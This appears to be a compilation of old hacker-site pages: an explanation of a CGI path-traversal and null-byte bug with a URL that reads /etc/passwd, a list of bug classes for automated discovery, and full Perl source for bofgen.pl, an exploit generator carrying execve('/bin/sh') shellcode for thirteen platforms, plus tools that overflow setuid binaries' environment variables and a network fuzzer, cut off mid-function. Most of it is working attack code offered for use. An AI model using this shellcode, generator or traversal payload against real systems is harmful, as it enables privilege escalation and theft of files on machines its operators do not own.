The problem with this code is that a malicious user is able to read data that s/he shouldn't have access to. An example of this is someone trying to read /etc/passwd. /etc/passwd is a good example of a file to be read since it's almost always readable by any user and is on almost all UNIX-like systems. There are two things that are required, which should be, but aren't, filtered in this program, to allow someone to read a file such as /etc/passwd. One is to escape the directory that the open() statement would normally read in, and second is to escape the ".html" put at the end of the open(). Here is an example of a URL to read the /etc/passwd on a machine running the example CGI: http://server/cgi-bin/the.cgi?file=../../../../../../../../etc/passwd%00 The CGI then reads "htmlfiles/../../../../../../../../etc/passwd\0.html" \0 is the null terminator. The null terminator is what escapes the .html since the open() and many other functions in many languages stop reading inputted data once it reaches a null terminator. And to escape the directory that the open() reads in, we use ../'s.
- Algorithm
1. Spider the website, starting from the root index.
2. Recursively search through all URLs on the web site to find all URLs that are on that machine.
3. Find all URLs in the already-found URLs that contain a '?' and assume that those are the only URLs that are vulnerable to our bug.
4. Find all key and element pairs in each of these URLs and find all URLs with only a key (no '=' in the URL) and consider that key an element.
5. Go through each key and element of each URL and replace each element of each URL with a '../' x 20 . 'etc/passwd%00'.
6. For every element replacement, do a GET request on that URL and match the responses for /root:/.
7. For each response that contains 'root:', decrement the URL by one '../', do a GET request on the new URL, and check the response again to see if it contains a 'root:' repeatedly. Once the response does not contain a 'root:', add one more '../' to the URL and log that URL as an exploitable CGI. Continue element replacement to find any other bugs for other key and element pairs.
http://www.samy.pl/5balgo1.html

CC V
by H1kari, BasharTeg, CommPort5
Sample code available here.
You must also download the template session capture file available here.
5b. Automatic Exploit Discovery -
1. Identify classifications of common software bugs as specifically as possible
2. Name a theoretical example of each bug, ideally in "ASCII over TCP" protocols
3. Describe an algorithm for automating remote detection of those bugs in client-server software. Assume that you have a working copy of server software, captured images of valid transactions and reasonable hardware. Ideal situations will need no knowledge of the protocol grammar beyond word and seperator characters.
The Answers -
a1. Failure to validate input buffer lengths
a2. In POP3 authentication, username input may not be length-validated.
a3. Most buffer overflows can be detected in ASCII protocols by replaying a captured session repeatedly, replacing one word each time with a 4097 character word.
- check for disconnect
b1. Fencepost a.k.a. Off by one counting errors
b2. In POP3 message retrieval, there could be an off-by-one error in the number of retreivable messages.
b3. Off-by-one errors can be detected by replaying a captured session with each numeric client-side word replaced with each previously seen numeric server words.
- check for different response
c1. Null Pointers, Dereferencing, Page Fault
c2. In POP3, deleting or retreiving message 0 without checking, or executing commands out of order might cause null pointers to be used.
c3. Null Pointers can be detected by replaying a captured session and executing the commands in a different order, or by replacing numerical words with 0 or negative numbers.
- check for disconnect
d1. Race Conditions
d2. In POP3 race conditions may occur when mail is received or removed and counters are modified while being read or written to by other connected clients.
d3. Race Conditions can be detected by replaying a captured session in a control process and executing other captured sessions with the commands put in various orders at the same time and looking for unexpected results. (e.g., run your control process without a second test process, then re-run with the test process running concurrently and check for deviations with the results).
- check for deviations
e1. Using uninitialized variables/memory
e2. In POP3 validation of protocol order may not be checked, sending your password before username or executing commands out of order may cause uninitialized variables to be used.
e3. Using uninitialized variables/memory can be detected by replaying a captured session with the client-side commands put in different order.
- check for disconnect
f1. Poorly implemented input matching
f2. In HTTP, failure to check filenames that might attempt a directory traversal ".." or unexpected characters or strings passed to cgi applications.
f3. Poorly implemented input matching can be detected by replaying a captured session with each word replaced with unexpected input characters depending on the protocol. (e.g. "..", file globbing characters -- "*, ?, +, [, ]", regex matching characters -- "+, *, ?, ^, $, (, ), {, }, [, ]", format string vuln characters -- "%s, %d, %p, %n, etc", common exec exploitation characters -- ";, <, >, |, ", '", null and non-ascii characters)
- check for different response
g1. Memory leaks (not freeing dynamically allocated memory)
g2. In POP3, if memory for each message is not freed and numerous messages are read, it could cause denial of service.
g3. Memory leaks can be detected by replaying a captured session and repeating a command numerous times while checking latency and availability.
- check for latency or disconnect
h1. Mixing signed and unsigned number variables
h2. In HTTP, sending an negative number as the byte count (Content-Length) for a POST, assuming the httpd uses a signed variable with the byte count. (which would check out fine if the program checks to see if the content-length is < the bytes read) And in turn if it set the length variable for the POST buffer to the negative number, it could cause the processing function to read more data than is supplied.
h3. Improper mixing of signed and unsigned number variables can be detected by replaying a captured session with all numerical words inverted to their negative equivalent, or positive equivalent if negative.
- check for different response
i1. Failure to resolve escapes before validating
i2. In HTTP, failure to resolve unicode, specialchars, and other http escaped characters before input matching.
i3. Failure to resolve escapes before validating can be detected by replaying a normal session as well as all input matching sessions with all characters escaped.
- check for different response
http://www.samy.pl/5balgo2.html


bofgen.pl - a buffer overflow exploit generation program
bofgen.pl is a simple buffer overflow exploit generation program I worked on for a little bit, just to make some things easier. it allows you to enter simple information and will create an advanced exploit for you, portable to many different architectures and operating systems. check it out.
bofgen.pl
getenvs.pl - this program finds environment variables in binary programs when you don't have source available to you (or you want to find them quickly). this is especially good for finding buffer overflows in programs easily
testenvs.pl - this will take a binary program, find all of the environment variables, and fill them up with data to attempt to overflow it. it's good with use of `find / -perm -4000`. it will easily help you find some exploitable (through ENV variables) programs and it will also attempt to exploit the program with a basic arguement buffer overflow.
options are below for bofgen (when certain questions are answered, that value may intentionally change/add/remove other questions)
Buffer Overflow Exploit Generation program [bofgen.pl]
By CommPort5 [@LucidX.com]

* = required, []'s = default (and required)

name of your exploit [exploit.pl]:
* path (full path recommended) to exploitable program:
nop [\x90]:
return address [0xbfffffff]:
offset [0]:
* length to overwrite %eip (without the +100):
remove all environment variables before executing program (1 = true, 0 = false) [1]:
* type of buffer overflow, 1 = arguement, 2 = environment:
1 = aix                 2 = bsdi
3 = dg_ux               4 = freebsd
5 = hp_ux               6 = linux_x86
7 = linux_sparc         8 = openbsd
9 = ppc_linux           10 = ppc_bsd
11 = openserver         12 = solaris_sparc
13 = unixware
* enter the OSs you would like support for (enter numbers, whitespace seperated):
preceding arguements (before buffer overflow, if any):
insert environment variable (key name, if any - not buffer overflow key):
insert environment data for key:
accept an offset from the user in command line (1 = true, 0 = false) [0]:
require an offset from the user in command line (1 = true, 0 = false) [0]:
accept a return address from the user in command line (1 = true, 0 = false) [0]:
require a return address from the user in command line (1 = true, 0 = false) [0]:
enter key to use to store buffer:

Exploit saved in exploit.pl

- made by bofgen.pl - http://bofgen.LucidX.com - CommPort5@LucidX.com -

http://www.samy.pl/bofgen/

#!/usr/bin/perl

#
# bofgen.pl - by CommPort5 [@LucidX.com]
# a local buffer overflow exploit generation program
# http://bofgen.LucidX.com
#

@{$exploit{osnums}} = (
	"aix",	"bsdi",	"dg_ux",	"freebsd",	"hp_ux",
	"linux_x86",	"linux_sparc",	"openbsd",	"ppc_linux",
	"ppc_bsd",	"openserver",	"solaris_sparc",	"unixware",
);

%shellcode = (
	aix =>
'0x7c0802a6 . 0x9421fbb0 . 0x90010458 . 0x3c60f019 .
0x60632c48 . 0x90610440 . 0x3c60d002 . 0x60634c0c .
0x90610444 . 0x3c602f62 . 0x6063696e . 0x90610438 .
0x3c602f73 . 0x60636801 . 0x3863ffff . 0x9061043c .
0x30610438 . 0x7c842278 . 0x80410440 . 0x80010444 .
0x7c0903a6 . 0x4e800420 . 0x0',

	bsdi =>
'"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" .
"\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" .
"\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"',

	dg_ux =>
'"\x58\xfe\xde\x23\x0f\x04\xde\x47\x04\x74\xf0\x43\xa4\x01\x8f\xb0" .
"\xa4\x01\x4f\x21\xfb\x6b\x3f\x24\x01\x80\x21\x20\xa8\x01\x2f\xb4" .
"\x10\x04\xff\x47\x80\xf4\xe2\x47\xff\x7f\x4a\x6b\x69\x6e\x3f\x24" .
"\x2f\x62\x21\x20\x73\x68\x5f\x24\xff\x2f\x42\x20\x82\x16\x41\x48" .
"\x90\x01\x2f\xb0\x94\x01\x4f\xb0\x98\x01\xef\xb5\xa0\x01\xef\xb7" .
"\x90\x01\x0f\x22\x98\x01\x2f\x22\x12\x04\xff\x47\x80\x74\xe7\x47" .
"\xff\x7f\xea\x6b"',

	freebsd =>
'"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" .
"\x69\x89\xe3\x51\x52\x53\x53\x6a\x3b\x58\xcd\x80"',

	hp_ux =>
'"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" .
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" .
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"',

	linux_x86 =>
'"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d" .
"\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3" .
"\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" .
"\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh"',

	linux_sparc =>
'"\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" .
"\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" .
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" .
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" .
"\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x10"',

	openbsd =>
'"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" .
"\x69\x89\xe3\x51\x52\x53\x53\x6a\x3b\x58\xcd\x80"',

	ppc_linux =>
'0x7CC63278 . 0x2F867FFF . 0x41BC0054 . 0x7C6802A6 .
0xB0C3FFF9 . 0xB0C3FFF1 . 0x38867FF0 . 0x38A67FF4 .
0x38E67FF3 . 0x7CA52278 . 0x7CE72278 . 0x7C853A14 .
0x7CC419AE . 0x7C042A14 . 0x7CE72850 . 0x7C852A14 .
0x7C63212E . 0x7C832214 . 0x7CC5212E . 0x7CA52A78 .
0x44FFFF02 . 0x7CE03B78 . 0x44FFFF02 . 0x4BFFFFB1 .
0x2F62696E . 0x2F73685A . 0xFFFFFFFF . 0xFFFFFFFF',

	ppc_bsd =>
'0x7CC63278 . 0x2F867FFF . 0x41BC0054 . 0x7C6802A6 .
0xB0C3FFF9 . 0xB0C3FFF1 . 0x38867FF0 . 0x38A67FF4 .
0x38E67FF3 . 0x7CA52278 . 0x7CE72278 . 0x7C853A14 .
0x7CC419AE . 0x7C042A14 . 0x7CE72850 . 0x7C852A14 .
0x7C63212E . 0x7C832214 . 0x7CC5212E . 0x7CA52A78 .
0x44FFFF02 . 0x7CE03B78 . 0x44FFFF02 . 0x4BFFFFB1 .
0x2F62696E . 0x2F73685A . 0xFFFFFFFF . 0xFFFFFFFF',

	openserver =>
'"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" .
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" .
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"',

	solaris_sparc =>
'"\x90\x1b\xc0\x0f\x82\x10\x20\x17\x91\xd0\x20\x08\x90\x1b\xc0\x0f"
"\x82\x10\x20\x1b\x91\xd0\x20\x08\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1b\xc0\x0f"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08"',

	unixware =>
'"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" .
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf" .
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff" .
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53" .
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f" .
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff"',
);

%default = (
	name	=> "exploit.pl",
	nop	=> '\x90',
	ret	=> '0xbfffffff',
	offset	=> 0,
	rmenv	=> 0,
	aoff	=> 0,
	roff	=> 0,
	aret	=> 0,
	rret	=> 0,
);

%colors = (    'clear'      => 0,
               'reset'      => 0,
               'bold'       => 1,
               'dark'       => 2,
               'underline'  => 4,
               'underscore' => 4,
               'blink'      => 5,
               'reverse'    => 7,
               'concealed'  => 8,
               'black'      => 30,   'on_black'   => 40,
               'red'        => 31,   'on_red'     => 41,
               'green'      => 32,   'on_green'   => 42,
               'yellow'     => 33,   'on_yellow'  => 43,
               'blue'       => 34,   'on_blue'    => 44,
               'magenta'    => 35,   'on_magenta' => 45,
               'cyan'       => 36,   'on_cyan'    => 46,
               'white'      => 37,   'on_white'   => 47,
);

print "\nBuffer Overflow Exploit Generation program [bofgen.pl]\n";
print "By CommPort5 [\@LucidX.com]\n\n";

print "* = required, []'s = default (and required)\n\n";

print "name of your exploit [$default{name}]: ";
chomp($exploit{name} = <STDIN>);
$exploit{name} = $default{name} if $exploit{name} eq '';

while (!$exploit{path}) {
 print "* path (full path recommended) to exploitable program: ";
 chomp($exploit{path} = <STDIN>);
}

print "nop [$default{nop}]: ";
chomp($exploit{nop} = <STDIN>);
$exploit{nop} = $default{nop} if $exploit{nop} eq '';

print "return address [$default{ret}]: ";
chomp($exploit{ret} = <STDIN>);
$exploit{ret} = $default{ret} if $exploit{ret} eq '';

while ($exploit{offset} !~ /^\d+$/) {
 print "offset [$default{offset}]: ";
 chomp($exploit{offset} = <STDIN>);
 $exploit{offset} = $default{offset} if $exploit{offset} eq '';
}

while ($exploit{len} !~ /^\d+$/) {
 print "* length to overwrite %eip (without the +100): ";
 chomp($exploit{len} = <STDIN>);
}
$exploit{len} += 100;

while ($exploit{rmenv} !~ /^(1|0)$/) {
 print "remove all environment variables before executing program (1 = true, 0 = false) [$default{rmenv}]: ";
 chomp($exploit{rmenv} = <STDIN>);
 $exploit{rmenv} = $default{rmenv} if $exploit{rmenv} eq '';
}

while ($exploit{type} !~ /^(1|2)$/) {
 print "* type of buffer overflow, 1 = arguement, 2 = environment: ";
 chomp($exploit{type} = <STDIN>);
}

for ($i = 1; $i <= @{$exploit{osnums}}; $i += 2) {
 print "$i = $exploit{osnums}[$i-1]\t\t";
 if ($exploit{osnums}[$i]) {
  print ($i + 1);
  print " = $exploit{osnums}[$i]";
 }
 print "\n";
}
while ($exploit{os} !~ /^(\s*\d+\s*)+$/) {
 print "* enter the OSs you would like support for (enter numbers, whitespace seperated): ";
 chomp($exploit{os} = <STDIN>);
}
foreach (split(/\s+/, $exploit{os})) {
 push(@{$exploit{oss}}, $exploit{osnums}[$_-1]);
}

print "preceding arguements (before buffer overflow, if any): ";
chomp($exploit{parg} = <STDIN>);

do {
 print "insert environment variable (key name, if any - not buffer overflow key): ";
 chomp($tmp = <STDIN>);
 if ($tmp) {
  print "insert environment data for key $tmp: ";
  chomp($exploit{keys}{$tmp} = <STDIN>);
 }
} while ($tmp);

while ($exploit{aoff} !~ /^(1|0)$/) {
 print "accept an offset from the user in command line (1 = true, 0 = false) [$default{aoff}]: ";
 chomp($exploit{aoff} = <STDIN>);
 $exploit{aoff} = $default{aoff} if $exploit{aoff} eq '';
}

if ($exploit{aoff}) {
 while ($exploit{roff} !~ /^(1|0)$/) {
  print "require an offset from the user in command line (1 = true, 0 = false) [$default{roff}]: ";
  chomp($exploit{roff} = <STDIN>);
  $exploit{roff} = $default{roff} if $exploit{roff} eq '';
 }
}

while ($exploit{aret} !~ /^(1|0)$/) {
 print "accept a return address from the user in command line (1 = true, 0 = false) [$default{aret}]: ";
 chomp($exploit{aret} = <STDIN>);
 $exploit{aret} = $default{aret} if $exploit{aret} eq '';
}

if ($exploit{aret}) {
 while ($exploit{rret} !~ /^(1|0)$/) {
  print "require a return address from the user in command line (1 = true, 0 = false) [$default{rret}]: ";
  chomp($exploit{rret} = <STDIN>);
  $exploit{rret} = $default{rret} if $exploit{rret} eq '';
 }
}

if ($exploit{type} == 2) {
 while (!$exploit{key}) {
  print "enter key to use to store buffer: ";
  chomp($exploit{key} = <STDIN>);
 }
}

$scdata = '%shellcode = (';
for ($i = 0; $i < @{$exploit{oss}}; $i++) {
 $scdata .= "\n\t$exploit{oss}[$i]\t=>\n$shellcode{$exploit{oss}[$i]},\n";
}
$scdata .= ");\n\n\@os = (";
for ($i = 0; $i < @{$exploit{oss}}; $i++) {
 $scdata .= "\n\t\"$exploit{oss}[$i]\",";
}
$scdata .= "\n);";

$argdata = "<OS #> ";
$argnum = 1;
$argmax = 1;
if ($exploit{aoff}) {
 if ($exploit{roff}) {
  $argdata .= "<-o offset> ";
  $argnum += 2;
  $argmax += 2;
 }
 else {
  $argdata .= "[-o offset] ";
  $argmax += 2;
 }
}
if ($exploit{aret}) {
 if ($exploit{rret}) {
  $argdata .= "<-r return address> ";
  $argnum += 2;
  $argmax += 2;
 }
 else {
  $argdata .= "[-r return address] ";
  $argmax += 2;
 }
}

print "\n";
$comment = << "EOF";

#
# $exploit{name} - generated by bofgen.pl by CommPort5 [\@LucidX.com]
# a buffer overflow exploit generation program
# http://bofgen.LucidX.com
#
EOF

$data = << "EOF";
#!/usr/bin/perl
$comment
(\$osn, \$offset, \$ret) = &check;

$scdata

\$len = $exploit{len};
\$nop = "$exploit{nop}";

for (\$i = 0; \$i < (\$len - length(\$shellcode{\$os[\$osn-1]}) - 100); \$i++) {
 \$buffer .= \$nop;
}

\$buffer .= \$shellcode{\$os[\$osn-1]};
\$addr = pack('l', (\$ret + \$offset));
for (\$i += length(\$shellcode{\$os[\$osn-1]}); \$i < \$len; \$i += 4) {
 \$buffer .= \$addr;
}

EOF

if ($exploit{rmenv}) {
 $data .= "foreach (keys(\%ENV)) {\n delete \$ENV{\$_};\n}\n";
}

foreach (keys(%{$exploit{keys}})) {
 $data .= "\$ENV{$_} = \"$exploit{keys}{$_}\";\n";
}

if ($exploit{type} == 1) {
 $data .= "\nexec(\"$exploit{path}\", ";
 foreach (split(/\s+/, $exploit{parg})) {
  $data .= "\"$_\", ";
 }
 $data .= "\$buffer);\n";
}
else {
 $data .= "\n\$ENV{$exploit{key}} = \$buffer;\nexec(\"$exploit{path}\"";
 foreach (split(/\s+/, $exploit{parg})) {
  $data .= ", \"$_\"";
 }
 $data .= ");\n";
}

$data .= << "EOF";


sub check {
 \$ret = $exploit{ret};
 \$offset = $exploit{offset};
 if (\@ARGV < $argnum or \@ARGV > $argmax) {
  &error;
 }
 \$osn = shift(\@ARGV);
 for (\$i = 0; \$i < \@ARGV; \$i++) {
  if (\$ARGV[\$i] =~ /^[^-]/ && \$ARGV[\$i-1] =~ /^[^-]/) {
   &error;
  }
  if (\$ARGV[\$i] =~ /^-/) {
   if (\$ARGV[\$i] =~ /^-(o|r)\$/i) {
    if (\$1 eq 'o') {
     \$offset = \$ARGV[\$i+1];
    }
    elsif (\$1 eq 'r') {
     \$ret = \$ARGV[\$i+1];
    }
   }
   else {
    &error;
   }
  }
 }
 return(\$osn, \$offset, \$ret);
}

sub error {
 print STDERR "usage: \$0 $argdata\\n" if \@ARGV < $argnum;
EOF

for ($i = 1; $i <= @{$exploit{oss}}; $i++) {
 $data .= " print STDERR \" $i = $exploit{oss}[$i-1]\\n\";\n";
}
$data .= " die \"\\n\";\n}\n";
$data .= $comment;

open(EXPLOIT, ">$exploit{name}") or die "Can't open $exploit{name} for writing: $!\n";
print EXPLOIT $data;
close(EXPLOIT);

print STDERR "Exploit saved in $exploit{name}\n";
die "\n- made by bofgen.pl - http://bofgen.LucidX.com - CommPort5\@LucidX.com -\n";

# h4w h4w h4w
# -cp5


#!/usr/bin/perl

# getenvs.pl - by CommPort5 [@LucidX.com]
# this is a hacked up and nice version of v9's getenv program
# so credits go to him

$SIG{INT} = \&data;
$SIG{'TSTP'} = \&data;

die "usage: $0 < /path/to/binary >\n" unless @ARGV == 1;

@ignore = split(/\s+/,
"TTOU TTIN TSTP STOP CONT CHLD STKFLT ALRM PIPE USR2 SEGV USR1 KILL FPE BUS IOT ABRT TRAP ILL QUIT INT HUP _DYNAMIC _GLOBAL_OFFSET_TABLE_ --");

print "getenvs.pl :: finds environment variables in binary programs\n";

&readbinary(@ARGV);
&data;
exit(0);

sub readbinary {
 open(BINARY, shift) || die "Can't open file: $!\n";
 @read = <BINARY>;
 close(BINARY);
 $i = 0;
 $tokens = @read;
 while ($read[$i]) {
  @tmpread = split(chr(0), $read[$i]);
  $tokens = @tmpread;
  $j = -1;
  while ($j < $tokens) {
   $j++;
   $k = 0;
   while (isvalid(substr($tmpread[$j], $k, 1)) && length($tmpread[$j]) > 1) {
    if ($k + 1 == length($tmpread[$j])) {
     $m = 0;
     @s = @ignore;
     $l = 0;
     while ($s[$l]) {
      if ($s[$l] eq $tmpread[$j]) {
       $m++;
      }
      $l++;
     }
     @s = split(/,/, $result);
     $l = 0;
     while ($s[$l]) {
      if ($s[$l] eq $tmpread[$j] || $s[$l] eq " $tmpread[$j]") {
       $m++;
      }
      $l++;
     }
     if (!$m && substr($tmpread[$j], 0, 3) ne "SIG" && substr($tmpread[$j], 0, 2) ne "__" &&
     substr($tmpread[$j], length($tmpread[$j]) - 2, 2) ne "__") {
      if (!$result) {
       $result = $tmpread[$j];
      }
      else {
       $result = "$result, $tmpread[$j]";
      }
     }
    }
    $k++;
   }
  }
  $i++;
 }
}

sub data {
 if ($result) {
  print "possible ENV variables: $result\n";
 }
 else {
  print "no typical ENV variables found.\n";
 }
}

sub isvalid {
 $char = substr(shift, 0, 1);
 if (ord($char) > 64 && ord($char) < 91 || ord($char) > 47 && ord($char) < 58 || ord($char) == 45 || ord($char) == 95) {
  return 1;
 }
 return 0;
}


#!/usr/bin/perl

# testenvs.pl - by CommPort5 [@LucidX.com]
# some of this code is a hacked up version of v9's getenv program
# for finding envs in binary programs

$SIG{INT} = \&data;
$SIG{'TSTP'} = \&data;

die "usage: $0 < /path/to/binary >\n" unless @ARGV == 1;

@ignore = split(/\s+/,
"TERM USER TTOU TTIN TSTP STOP CONT CHLD STKFLT ALRM PIPE USR2 SEGV USR1 KILL FPE BUS IOT ABRT TRAP ILL QUIT INT HUP _DYNAMIC _GLOBAL_OFFSET_TABLE_ --");

print "testenvs.pl :: tests environment variables in binary programs for buffer overflows\n";

open(BINARY, shift) || die "Can't open file: $!\n";
@read = <BINARY>;
close(BINARY);
$i = 0;
$tokens = @read;
while ($read[$i]) {
 @tmpread = split(chr(0), $read[$i]);
 $tokens = @tmpread;
 $j = -1;
 while ($j < $tokens) {
  $j++;
  $k = 0;
  while (isvalid(substr($tmpread[$j], $k, 1)) && length($tmpread[$j]) > 1) {
   if ($k + 1 == length($tmpread[$j])) {
    $m = 0;
    @s = @ignore;
    $l = 0;
    while ($s[$l]) {
     if ($s[$l] eq $tmpread[$j]) {
      $m++;
     }
     $l++;
    }
    @s = split(/,/, $result);
    $l = 0;
    while ($s[$l]) {
     if ($s[$l] eq $tmpread[$j] || $s[$l] eq " $tmpread[$j]") {
      $m++;
     }
     $l++;
    }
    if (!$m && substr($tmpread[$j], 0, 3) ne "SIG" && substr($tmpread[$j], 0, 2) ne "__" &&
    substr($tmpread[$j], length($tmpread[$j]) - 2, 2) ne "__") {
     if (!$result) {
      $result = $tmpread[$j];
     }
     else {
      $result = "$result, $tmpread[$j]";
     }
    }
   }
   $k++;
  }
 }
 $i++;
}

&data;

sub data {
 if ($result) {
  foreach (split(/,\s*/, $result)) {
   $ENV{$_} = "A" x 2500;
  }
  exec("$ARGV[0] " . "A" x 2500);
 }
 else {
  print "no typical ENV variables found.\nattempt arguement overflows manually [and environment, if any].\n";
 }
}

sub isvalid {
 $char = substr(shift, 0, 1);
 if (ord($char) > 64 && ord($char) < 91 || ord($char) > 47 && ord($char) < 58 || ord($char) == 45 || ord($char) == 95) {
  return 1;
 }
 return 0;
}
http://www.samy.pl/bofgen/

#!/usr/bin/perl

# Caezar's Challenge 5b - by h1kari and CommPort5.
# Shouts to BasharTeg for his help with the bug list and question answers.
#
# 5bhack.pl v0.01 - discovers common bugs within ascii based tcp protocols
# using captured sessions and generic protocol information.
#
# this is an extremely generalized proof-of-concept, so manual checking of the
# results must be done for accurate detection. possible future features should
# include more intelligent protocol support and intuitive scripting for
# protocol-specific symantics.
#
# NOTE: capture file must be in a format compatible to the sample capture file
# included

# config vars
my $maxread    = 4096;
my $recvtout   = 0.1;
my $vulnchkstr = '../../../../../.../..../...../*?+[]^$(){}\'";<>|%s%d%p%n';
my $_5ba_incr  = 4096;
my $_5ba_tries = 3;
my $_5bg_tries = 10;
my $_5bg_tout  = 0.1;

# parse input and initialize
use Net::Telnet;

($ARGV[2]) or
 die "5bhack.pl - for caezar's challenge's question 5b - by h1kari and CommPort5.\n".
 "usage: $0 <capture file> <host> <port> <tests a-i> [verbose level]\n".
 "  verbose:\n".
 "    0/undef - only print necessary information\n".
 "    1       - print high verbose for necessary information\n".
 "    2       - print lower-risk information\n".
 "    3       - print high verbose for lower-risk information\n";

require $ARGV[0];
my $host    = $ARGV[1];
my $ip      = &host2ip($host);
my $port    = $ARGV[2];
my @tests   = split //, $ARGV[3];
my $verbose = $ARGV[4];

# run tests
for(@tests)
{
  if($_ =~ /^[a-i]$/)
  {
    print "----------------[ running test 5b$_....\n";
    eval "&try_5b$_";
  }
}

# 5ba functions
sub try_5ba
{
  for(1..$_5ba_tries)
  {
    my @sessions = &get_5ba_sessions(($_ * $_5ba_incr) + 1);
    &send_std_session(1, \@sessions);
  }
}

sub get_5ba_sessions
{
  my $size = @_[0];
  my(@sessions, $i, $j, $k);
  $i = 0;

  foreach $j (0..$#send)
  {
    my @words = split /$sepregex+/, $send[$j];
    foreach $k (0..$#words)
    {
      my @words_temp = @words;
      $words_temp[$k] = $words_temp[$k] ."A"x($size - length($words_temp[$k]));
      @{$sessions[$i]} = @send;
      $sessions[$i++][$j] = join $seperator, @words_temp;
    }
  }

  return @sessions;
}

# 5bb functions
sub try_5bb
{
  my @sessions = &get_5bb_sessions;
  &send_std_session(2, \@sessions);
}

sub get_5bb_sessions
{
  my(@sessions, $i, $j, $k, $l, %nums);
  $i = 0;

  foreach $j (0..$#send)
  {
    my @words = split /$sepregex+/, $send[$j];
    foreach $k (0..$#words)
    {
      if($words[$k] =~ /^\-?[0-9]+$/)
      {
        $nums{$words[$k]} = 1;
      }
    }
  }

  foreach $j (0..$#send)
  {
    my @words = split /$sepregex+/, $send[$j];
    foreach $k (0..$#words)
    {
      if($words[$k] =~ /^\-?[0-9]+$/)
      {
        my @words_temp = @words;
        foreach $l (keys(%nums))
        {
          if($words_temp[$k] == $l) { next }
          $words_temp[$k] = $l;
          @{$sessions[$i]} = @send;
          $sessions[$i++][$j] = join $seperator, @words_temp;
        }
      }
    }
  }

  return @sessions;
}

# 5bc functions
sub try_5bc
{
  my @sessions = &get_5bc_sessions;
  &send_std_session(1, \@sessions);
}

sub get_5bc_sessions
{
  my(@sessions, $i, $j, $k);
  $i = 0;

  foreach $j (0..$#send)
  {
    my @words = split/$sepregex+/, $send[$j];
    foreach $k (0..$#words)
    {
      if($words[$k] =~ /^\-?[0-9]+$/)
      {
        my @words_temp = @words;
        # first replace with 0
        if($words[$k] != 0)
        {
          $words_temp[$k] = 0;
          @{$sessions[$i]} = @send;
          $sessions[$i++][$j] = join $seperator, @words_temp;
        }
        # then with the inverse of the number or -1 if it's 0.
        ($words_temp[$k] ? ($words_temp[$k] *= -1) : ($words_temp[$k] = -1));
        @{$sessions[$i]} = @send;
        $sessions[$i++][$j] = join $seperator, @words_temp;
      }
    }
  }

  return @sessions;
}

# 5bd functions
sub try_5bd
{
  my $i;
  my @sessions = &get_5bd_sessions;

  # implementation isn't the best, but it outlines what needs to be done.
  foreach $i (0..$#sessions)
  {
    my(@temp_send, @temp_sessions);
    @{$temp_send[0]} = @send;
    @{$temp_sessions[0]} = @{$sessions[$i]};
    if(!fork)
    {
      &send_std_session(0, \@temp_sessions);
      exit;
    }
    &send_std_session(1, \@temp_send);
    # wait until child process is reaped
    while(wait != -1) { wait }
  }
}

sub get_5bd_sessions
{
  my(@sessions, $i, $l, $combos);
  $i = 0;

  $l = newcombo main(@send);
  while(@{$sessions[$i++]} = $l->nextcombo) { }

  return @sessions;
}

# 5be functions
sub try_5be
{
  my $i;
  my @sessions = &get_5be_sessions;
  &send_std_session(1, \@sessions);
}

sub get_5be_sessions
{
  my(@sessions, $i, $l, $combos);
  $i = 0;

  $l = newcombo main(@send);
  while(@{$sessions[$i++]} = $l->nextcombo) { }

  return @sessions;
}

# 5bf functions
sub try_5bf
{
  my @sessions = &get_5bf_sessions;
  &send_std_session(2, \@sessions);
}

sub get_5bf_sessions
{
  my(@sessions, $i, $j, $k);
  $i = 0;

  foreach $j (0..$#send)
  {
    my @words = split /$sepregex+/, $send[$j];
    foreach $k (0..$#words)
    {
      my @words_temp = @words;
      # lets try adding the vuln checking string to both the front and end
      $words_temp[$k] = $words[$k] .$vulnchkstr;
      @{$sessions[$i]} = @send;
      $sessions[$i++][$j] = join $seperator, @words_temp;
